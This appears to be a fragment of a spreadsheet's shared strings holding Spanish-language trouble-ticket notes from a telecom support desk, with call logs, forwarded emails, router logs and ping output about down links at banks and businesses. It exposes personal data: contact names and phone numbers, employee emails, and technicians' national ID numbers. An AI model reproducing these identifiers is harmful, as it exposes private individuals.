  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANIBAL GONZALEZ 57081768 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001303111 - 2001303388</t>
  </si>
  <si>
    <t>SE VALIDA COLA DE CORREOS, NO SE OBSERVA RESPUESTA POR PARTE DEL CLIENTE
ASUNTO: RE: 8902323T // REDUNDANCIA.- MIXCO SN CRISTOBAL 5 AV. 3-05 SECTOR A-3 SAN CRISTOBAL 1 ZONA 8 MIXC</t>
  </si>
  <si>
    <t>SE VERIFICA COLA DE CORREOS, NO SE OBSERVA RESPUESTA POR PARTE DEL CLIENTE
8902323T // REDUNDANCIA.- MIXCO SN CRISTOBAL 5 AV. 3-05 SECTOR A-3 SAN CRISTOBAL 1 ZONA 8 MIXCO</t>
  </si>
  <si>
    <t>SIN RESPUESTA DE CLIENTE
8902323T // REDUNDANCIA.- MIXCO SN CRISTOBAL 5 AV. 3-05 SECTOR A-3 SAN CRISTOBAL 1 ZONA 8 MIXCO
CARLOS EDGARDO ICHEL ESCOBAR
BUENAS TARDES APRECIABLE CLIENTE
SOLICITAMOS DE SU APOYO CONFIRMANDO FECHA Y HORA PARA COORDINAR VISITA.</t>
  </si>
  <si>
    <t>SE PROCEDE A LLAMAR A LA CENTRAL 25041690 , PERO NO SE TIENE RESPUESTA
CID 3001730470</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001572417 - 3001573160</t>
  </si>
  <si>
    <t>NO SE OBSERVA RESPUESTA POR PARTE DEL CLIENTE
8902323T // REDUNDANCIA.- MIXCO SN CRISTOBAL 5 AV. 3-05 SECTOR A-3 SAN CRISTOBAL 1 ZONA 8 MIXCO</t>
  </si>
  <si>
    <t>SE VERIFICA COLA DE CORREOS, NO SE OBSERVA RESPUESTA DE CLIENTE
8902323T // REDUNDANCIA.- MIXCO SN CRISTOBAL 5 AV. 3-05 SECTOR A-3 SAN CRISTOBAL 1 ZONA 8 MIXCO</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001464291 - 3001465569</t>
  </si>
  <si>
    <t>PENDIENTE CONFIRMACION DE CLIENTE PARA ACCESOS, PROCESO INTERNO SE DEBE EPERAR CONFIRMACION CORREO ENVIADO 16/05/2022 08:51:02</t>
  </si>
  <si>
    <t>SIN RESPUESTA DE CLIENTE A COLA DE CORREOS, SE DEBE DE ESPERAR QUE ES UN TRAMITE INTERNO DEL CLIENTE</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 57081768 INDICA QUE ESE CASO LO ESTA VIENDO POR CORREO CON EL GERENTE DE AGENCIA INDICA QUE HOY LE ESCRIBIRA NUEVAMENTE PARA VER SI CONSIGUIO PERMISOS PARA ESTA SEMANA Y SI LE CONTESTA NOS ESTARA COPIANDO EL CORREO **
ID 2001595312
**
**</t>
  </si>
  <si>
    <t>SIN CONFIRMACION DE CLEINTE PARA VISITA</t>
  </si>
  <si>
    <t>SIN RESPUESTA DE CLIENTE
**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 57081768 INDICA QUE ESE CASO LO ESTA VIENDO POR CORREO CON EL GERENTE DE AGENCIA INDICA QUE HOY LE ESCRIBIRA NUEVAMENTE PARA VER SI CONSIGUIO PERMISOS PARA ESTA SEMANA Y SI LE CONTESTA NOS ESTARA COPIANDO EL CORREO **</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ERICK ESCOTO 99924532 INDICA QUE ESTA REALIZANDO PRUEBAS CON SU PROVEEDOR Y SOLICITA LLAMADA A LAS 15:00 HORAS</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ERICK ESCOTO 99924532 APOYA REALIZANDO PRUEBAS DESDE NÚMEROS TIGO Y CLARO, COMENTA QUE YA OBSERVA LOS NÚMEROS EN SU IDENTIFICADOR, PERO LE APARECE UN NUEVE ANTES DE LOS 8 DÍGITOS, ("9" "XXXXXXXX"), ESTA REALIZANDO PRUEBAS Y SOLICITA LLAMADA EN 1 HORA</t>
  </si>
  <si>
    <t>F4550917</t>
  </si>
  <si>
    <t>TICKET : 8901205T
CLIENTE : BANCO DE DESARROLLO RURAL, S.A.
DIRECCIÓN : CANTON CIPRES, EDIFICIO MUNICIPAL, CONCEPCION JUISTA, HUEHUETENANGO
ESCALACIÓN
4/4	JOSE FERNANDO ROMERO	58260956    	253 HORAS	
ESTADO ACTUAL: SE ENVIA CORREOEN SEGUIMIENTO A FALLA F4543251, SE COLOCA WA, SE SOLICITA MIGRACIÓN CARTA DE SOLICITUD SE AGREGA A ESTE TICKET
TIEMPO ACUMULADO WO  253 HORAS @JOSE ROMERO</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A LOS NUMERO DE CONTACTO PERO NO SE TIENE RESPUESTA
2001006799
COLA:
NOMBRE: A: 52554502
NÚMERO: 52554502
DURACIÓN: 0:00:44
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 52554502
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 12/05/2022 12:18:38
2001007898
COLA:
NOMBRE: A: 31615244
NÚMERO: 88888888
DURACIÓN: 0:00:51
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 88888888
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 12/05/2022 12:20:35</t>
  </si>
  <si>
    <t>SE REALIZA LA LLAMDA, ME RESPONDEN PERO SE CORTA, SE LLAMARA NUEVAMENTE
1001979163
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:03:20
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 12/05/2022 11:10:22</t>
  </si>
  <si>
    <t>SE TERMINA LLAMADA DONDE ME DICE QUE LAS PRUEBAS FINALIZARON Y QUE YA SE TIENE EN ENLACE DE CLARO OPERATIVO, ME INDICA QUE NO SE TIENE RESPERADO MAS PRUEBAS.
1001982891
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:09:14
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 12/05/2022 11:25:27</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO GESTIONAR PERMISO DE ACCESO
DE: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;ENVIADO: JUEVES, 12 DE MAYO DE 2022 18:12PARA: ATM@BANCOAGRICOLA.COM.SV &lt;ATM@BANCOAGRICOLA.COM.SV&gt;; RDUENAS@BANCOAGRICOLA.COM.SV &lt;RDUENAS@BANCOAGRICOLA.COM.SV&gt;; ATMS@BANCOLOMBIA.COM.CO &lt;ATMS@BANCOLOMBIA.COM.CO&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;CC: FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;ASUNTO: RE: ALARMA DEL CAJERO: CC_BANCO_AGRICOLA_SV_ATM_CANDELARIA_FRONTERA
BUENAS TARDES,
DÁNDOLE SEGUIMIENTO AL ENLACE PROACTIVO SE SOLICITA GESTIONAR PERMISOS PARA EL PERSONAL TÉCNICO ASIGNADO PARA LA REVISIÓN DEL ENLACE, FAVOR INDICAR DÍA Y HORA EN LA QUE SE PODRÁ RECIBIR A PERSONAL DE CLARO EN INSTALACIONES DE CLIENTE. SE ADJUNTA LISTADO DE PERSONAL QUE PODRÍA ATENDER LA FALLA. QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
DUI CODIGO EMPLEADO
00936126-7 4799   MARIO ERNESTO CRUZ MARQUEZ
00354722-1 4378   RONAL MOREL CRESPIN
 00157708-4 4690  ABRAHAM SAMUEL PEREZ
00580847-9 2181   CARLOS EDUARDO GOMEZ ZELEDON
02878871-1 2437   JOSE ALFREDO JIMENEZ
04271773-2             MIGUEL DUEÑAS
03245714-4 8787   ADAN ERNESTO GONZALEZ
02085886-3 4492   JESUS OPICO CASTILLO
 01968544-3 9407   WALTER ERNESTO RODRIGUEZ PEREZ
01101266-2 4605   JOSE SALVADOR PORTILLO VELASQUEZ
01320096-0 9401    OSCAR RENE VIDES
04086816-7 12404  GERARDO ANTONIO MINERO
05356271-8               KEVIN ERNESTO MEJIA
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 0050325214842 CONTESTA EL SEÑOR RAFEL CLIENTE SOLICITA QUE SE LE REENVIE NUEVAMENTE EL CORREO CON LAS HERRARMIENTAS QUE SE UTILIZARAN Y QUE ES NECESARIO SUBIR AL TECHO Y EL PERSONAL QUE SE HARA PRESENTE || SE NOTIFICA A GESTOR **
ID 2001256162
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 0050325214842 MENCIONA QUE ES NECESARIO LE COMPARTAN POR CORREO LOS DATOS DEL PERSONAL QUE SE ENCUENTRA EN PR Y LAS HERRAMIENTAS QUE NECESITAN SUBIR AL TECHO
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001211919</t>
  </si>
  <si>
    <t>NO SE CUENTA  CON ACCESOS AUN DEPARTE DE CLIENTE, SE NOTIFICARA CUIANDO SE CUENTE CON ACCESOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 0050325214842 MENCIONA QUE ESTAN GESTIONANDO LOS PERMISOS Y RESPONDERAN POR CORREO EL HORARIO DE LA VISITA
-ID 2001292888</t>
  </si>
  <si>
    <t>F4553145</t>
  </si>
  <si>
    <t>NO SE HA TENIDO APOYO A LO DICHO EN CRONO ANTERIOR, SE ESCALA DE NUEVO CON KEVYN FONSECA/TEAM LEADER CLARO INDICA QUE VERIFICARÁ PARA APOYAR CON SEGUIMIENTO.</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR AL AREA DE TELECOMUNICACIONES PERO NO SE TIENE RESPUESTA, SE LLAMRA NUEVAMENTE
1001964694
COLA:
NOMBRE: A: 1720
NÚMERO: 23398888
DURACIÓN: 0:12:17
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 23398888
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 12/05/2022 10:42:06</t>
  </si>
  <si>
    <t>SE LOGRA CONTACTAR AL AREA DE TELECOMUNICACIONES DONDE ME INDICA QUE AHORA ME RESPONDE EL CORREO PARA PROCEDER CON EL BLOQUEO TEMPORAL.
1001969872
COLA:
NOMBRE: A: 1720
NÚMERO: 23398888
DURACIÓN: 0:05:23
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 23398888
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 12/05/2022 10:48:22</t>
  </si>
  <si>
    <t>CLIENTE SOLICITA SEGUIMIENTO PARA EL DÍA 27 DE MAYO A LAS 14:00 TICKET QUEDA EN PENDIENTE CLIENTE</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A CLIENTE PERO NO SE TIENE RESPUESTA
3001824322
COLA:
NOMBRE: A: 31290044
NÚMERO: 55280199
DURACIÓN: 0:00:39
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 19/05/2022 12:31:30</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EN DOS OCASIONES SIN EMBARGO NO HAY RESPUESTA.
3001968378
COLA:
NOMBRE: A: 31290044
NÚMERO: 55280199
DURACIÓN: 0:00:38
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 19/05/2022 14:34:51
3001968378
COLA:
NOMBRE: A: 31290044
NÚMERO: 55280199
DURACIÓN: 0:00:38
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 19/05/2022 14:34:51</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A CLIENTE PERO NO SE TIENE RESPUESTA
3001194373
COLA:
NOMBRE: A: 31290044
NÚMERO: 55280199
DURACIÓN: 0:00:47
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 18/05/2022 14:05:57</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VINICIO QUIEN INDICA QUE HOY ENVIARAN PERSONAL PARA REVISAR EL ENLACE Y REALIZAR EL CAMBIO DE BATERIA DEL UPS POR LO QUE SOLICITA QUE SE LLAME A LAS 16:30 PARA VALIDAR SI EL SERVICIO SE ENCUENTRA ACTIVO
2001019157
COLA:
NOMBRE: A: 31290044
NÚMERO: 011 50231290044
DURACIÓN: 0:01:49
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: +50231290044
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 12/05/2022 12:52:34</t>
  </si>
  <si>
    <t>SE LLAMA A VINICIO CARRERA QUIEN RESPONDE LA LLAMADA PERO SE DEJA DE ESCUCHAR Y SE CORTA LA LLAMADA
2001677069
COLA:
NOMBRE: A: 31290044
NÚMERO: 31290044
DURACIÓN: 0:01:07
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:DESTINO FUERA DE SERVICIO (CÓDIGO CAUSA ISDN 27)]
DETALLES: 31290044
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 16/05/2022 12:28:01</t>
  </si>
  <si>
    <t>SE VUELVE A LLAMAR A VINICIO CARRERA QUIEN INDICA QUE POR LO RETIRADO QUE SE ENCUENTRA DEL LUGAR NO SE HA REALIZADO EL CAMBIO DE BATERIA DEL UPS, INDICA QUE SOLICITARA APOYO PARA QUE RESTABLEZCAN LA COMUNICACIÓN DEL LOS EQUIPOS PUES ELLOS YA CUENTAN CON ENERGÍA Y SOLICITA QUE SE LLAME EL DÍA DE MAÑANA A LAS 12:30 PARA QUE EL TENGA TIEMPO SUFICIENTE DE COORDINAR LA SITUACION
2001677624
COLA:
NOMBRE: A: 31290044
NÚMERO: 31290044
DURACIÓN: 0:02:05
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 31290044
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 16/05/2022 12:30:44</t>
  </si>
  <si>
    <t>ENLACE CONTINUA CAIDO SE LLAMA A CLIENTE EN DOS OCASIONES SIN OBTENER RESPUESTA, LLAMADA ES ENVIADA A BUZÓN.
2001326091
COLA:
NOMBRE: A: 31290044
NÚMERO: 55280199
DURACIÓN: 0:00:17
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 13/05/2022 18:29:03
2001326121
COLA:
NOMBRE: A: 55280199
NÚMERO: 55280199
DURACIÓN: 0:00:11
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 13/05/2022 18:29:15</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS DOMINGUEZ 58452848 PARA SOLICITAR DATOS DE VISITA
-ID 2001606670
NOMBRE DEL CLIENTE: U. MARIANO GALVEZ
UBICACIÓN:6 AVENIDA 2-33 ZONA 1 ALTA VERAPAZ
CONTACTO EN SITIO: JUAN CARLOS DOMINGUEZ - 58452848
HORARIO DE ATENCION: VISITA PARA LAS 14:00 HRS
GESTIÓN DE PERMISOS: UNICAMENETE LLEGAR IDENTIFICADOS Y PREGUNTAR POR JUAN CARLOS DOMINGUEZ</t>
  </si>
  <si>
    <t>F4554431</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DE MONITOREO DE CAJEROS JUAN ALVARADO, COMENTANDO QUE EL SUPERVISOR ELVIS PEREZ LLEGÓ AL LUGAR Y ENCONTRO QUE EN EL TOMACORRIENDO DONDE ESTA CONECTADO EL EQUIPO DE FIBRA NO PASA ENERGÍA, INDICA QUE SE ESTARÁ ENVIANDO A REPARAR LAS CONEXIONES DE ENERGÍA.
2001037520
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:02:15
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 12/05/2022 13:51:28</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE CON RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 16:54
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; MALAQUIAS PANJOJ (VENDOR) &lt;MALAQUIAS.PANJOJ@WALMART.COM&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; JULIAN SALAZAR (VENDOR) &lt;JULIAN.SALAZAR@WALMART.COM&gt;; SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF MOMOSTENANGO ID: 344400615
BUENA TARDE
     EN SEGUIMIENTO AL TICKET SD1123662 SE REALIZA LA ENTREGA DE DICTAMEN TÉCNICO.
 CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A LA AGENCIA DONDE SE ME COMUNICA CON LA GENERENTE, ELLA ME INDICA QUE A INICIOS DE AÑO ME DICEN QUE SE HIZO MANTENIMIENTO EN LOS EQUIPOS Y QUE LE INDICARON QUE SE TIENEN 4 UPS EN MAL ESTADO Y DESDE ESE MOMENTO NO HAN ENVIADO NUEVOS UPS, ME DA EL NOMBRE Y EXTENCION DE LA PERSONA QUE HIZO MANTENIMIENTO PARA QUE QUIZA ELLA ME PUEDA APOYAR: CARLA MARROQUIN  EXT.301701, TAMBIEN SE PIDE UN CORREO DE LA AGENCIA YA QUE EL CORREO QUE SE ENVIO ANTERIOR MENTE NO LE LELGO: AGE130@BANRUAL.COM.GT.  S ENVIARA CORREO A LA AGENCIA PARA QUE ELLA LO REENVIE A LOS CORRESPONDIENTES Y PUEDAN APOYAR CON LOS NUEVOS UPS.
1001994034
COLA:
NOMBRE: A: 25041501
NÚMERO: 25041501
DURACIÓN: 0:10:59
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 25041501
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 12/05/2022 11:55:04</t>
  </si>
  <si>
    <t>SE REENVIA COLA DE CORREO, A LA ESPERA DE ALGUNA RESPUESTA DE SEGUIMIENTO.
DE: CARLOS IVAN PALENCIA FLORES &lt;CARLOSI.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 12:13
PARA: EDVIN.TARACENA@BANRURAL.COM.GT &lt;EDVIN.TARACENA@BANRURAL.COM.GT&gt;
CC: FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RV: ALARMAS RECURRENTES CC_BANRURAL_GT_AGENCIA_0130
BUEN TARDE ESTIMADO.
SE REENVÍA CORLA DE CORREOS PARA SU SEGUIMIENTO.
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.
DE: CARLOS IVAN PALENCIA FLORES &lt;CARLOSI.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 12:04
PARA: AGE130@BANRUAL.COM.GT &lt;AGE130@BANRUAL.COM.GT&gt;
ASUNTO: RV: ALARMAS RECURRENTES CC_BANRURAL_GT_AGENCIA_0130
BUENA TARDE,
ESTIMADO CLIENTE. SE REENVÍA CORREO SEGÚN LO INDICADO POR VÍA TELEFÓNICA A LA AGENCIA PARA QUE NOS APOYE CON REENVIARLO A LOS DESTINATARIOS CORRESPONDIENTES Y SE LE PUEDA DAR SEGUIMIENTO A LOS SOLICITADO.
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.
DE: WILLIAM GABRIEL SANAVRIA &lt;WILLIAM.SANAVRIA@CLARO.COM.GT&gt;
ENVIADO: MARTES, 10 DE MAYO DE 2022 11:13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ALARMAS RECURRENTES CC_BANRURAL_GT_AGENCIA_0130
ESTIMADO CLIENTE,
DEBIDO A QUE SE HAN PRESENTADO ALARMAS RECURRENTES EN EL ENLACE ABAJO DESCRITO, Y SEGÚN LO INDICADO VÍA TELEFÓNICA CON DAYAMI URIZA, EN LA AGENCIA NO CUENTAN CON PROTECCIÓN EN LOS EQUIPOS DE COMUNICACIÓN, POR TAL MOTIVO EL ENLACE SE ALARMA CUANDO SE TIENEN CORTES DE ENERGÍA. SE INDICÓ QUE SE HARÁ LA SOLICITUD PARA OBTENER UNA BATERÍA UPS PARA PROTEGER LOS EQUIPOS, SERIAN TAN AMABLES DE INDICARNOS UN TIEMPO ESTIMADO.
TICKET: F4556769
ID: 8901936T
IDENTIFICADOR DEL CLIENTE: CC_BANRURAL_GT_AGENCIA_0130
UBICADO EN: BARRIO LA PLAZUELA GRANADOS, BAJA VERAPAZ
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CARLA MARROQUIN A LA EXTENCION 301701 QUIEN ME RESPONDE EDVIN TARACENA QUIEN DARA SEGUIMIENTO CON LA AGENCIA PARA EL TEMA DE LOS UPS, SE LE REENVIARA EL CORREO CON LA SOLICITUD A EDVIN.TARACENA@BANRURAL.COM.GT.
2001003133
COLA:
NOMBRE: A: 25041501
NÚMERO: 25041501
DURACIÓN: 0:03:05
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 25041501
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 12/05/2022 12:09:31</t>
  </si>
  <si>
    <t>SE LLAMA A ANIBAL GONZALEZ PARA COSULTAR SOBRE EL TEMA DE INSTALACION DE UPS SIN EMBARGO NO HAY RESPUESTA | | SE CONTACTARA A CLIENTE EN HORARIO HABIL.
ANIBAL GONZALEZ TEL 44990369.
2001539553
COLA:
NOMBRE: A: 44244302
NÚMERO: 44244302
DURACIÓN: 0:00:56
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 44244302
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 15/05/2022 13:56:25</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A CLIENTE PERO EXTENSION SE ENCUENTRA OCUPADA
2001235732
COLA:
NOMBRE: A: 25041501
NÚMERO: 25041501
DURACIÓN: 0:00:54
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 25041501
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 13/05/2022 12:55:50</t>
  </si>
  <si>
    <t>SE REVIZA NUEVAMENTE DONDE SE VALIDA QUE TIENE ALARMAS DE SLA  DOWN A ESPERA  QUE LA CRONOLOGIA INDICA QUE YA ESTA ESCALADO CON KEVIN FONSECA PARA PODER REALIZAR LA ESCALACION DE LAS PRUEBAS SOLICITADAS  POR EL CLIENTE
*MAY 10 12:53:30.646: %TRACK-6-STATE: 20 IP SLA 20 REACHABILITY DOWN -&gt; UP
*MAY 10 12:55:07.830: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLARO ON VTY0 (10.1.230.121)
*MAY 10 12:56:26.886: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLARO ON VTY0 (10.1.230.121)
*MAY 10 12:57:43.454: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLARO ON VTY0 (10.1.230.121)
*MAY 10 20:03:25.876: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*MAY 10 20:03:30.876: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
*MAY 10 20:04:00.876: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*MAY 10 20:04:15.952: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
*MAY 11 23:37:01.745: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*MAY 11 23:37:06.745: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
1299455_CSC1941_BANCO_DE_HONDURAS_TEG54_DT05M#            SHO CLOC
1299455_CSC1941_BANCO_DE_HONDURAS_TEG54_DT05M#            SHO CLOCK
*04:02:42.950 GMT FRI MAY 13 2022
1299455_CSC1941_BANCO_DE_HONDURAS_TEG54_DT05M#
&lt;FDCEHNSCN1D1EIM1&gt;DIS IP ROUTING VPN-INSTANCE CITI_BDH 10.1.230.122
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : CITI_BDH
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.1.230.122/32  DIRECT  0    0                 0.0.0.0         VLANIF3001
&lt;FDCEHNSCN1D1EIM1&gt;PING -C 500 -S 1450 -M 30 -B -VPN-INSTANCE CITI_BDH 10.1.230.122
  PING 10.1.230.122: 1450  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.1.230.122 PING STATISTICS ---
    500 PACKET(S) TRANSMITTED
    500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/80 MS
